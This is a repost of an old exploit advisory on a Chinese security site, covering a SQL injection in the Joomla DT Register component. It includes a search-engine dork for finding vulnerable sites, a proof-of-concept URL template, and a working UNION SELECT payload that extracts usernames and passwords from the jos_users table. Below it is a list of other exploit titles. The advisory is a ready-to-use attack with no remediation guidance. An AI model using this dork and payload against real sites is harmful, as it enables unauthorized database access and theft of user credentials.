Joomla Component DT Register Remote SQL injection Vulnerability

所属分类：网络安全 / Exploit 阅读数： 294

收藏 0赞 0分享

/---------------------------------------------------------------\
\ /
/ Joomla Component DT Register Remote SQL injection \
\ /
\---------------------------------------------------------------/

[*] Author : His0k4 [ALGERIAN HaCkeR]

[*] Dork : inurl:com_DTRegister eventId

[*] Vendor : http://www.dthdevelopment.com/components/dt-register.html

[*] POC : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId={SQL}

[*] Example : http://[TARGET]/[Path]/index.php?option=com_dtregister&eventId=-12 UNION SELECT concat(username,0x3a,password) FROM jos_users&task=pay_options&Itemid=138

[*] Greetings : All friends & muslims HaCkeRs
www.dz-secure.com

----------------------------------------------------------------------------

更多精彩内容其他人还在看

Joomla Component DT Register Remote SQL injection Vulnerability

Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

NaviCOPA Web Server 2.01 Remote Buffer Overflow Exploit (meta)

MS Internet Explorer Recordset Double Free Memory Exploit

Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

Linux Kernel

MS Internet Explorer (FTP Server Response) DoS Exploit

MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption

网络赚钱

站长故事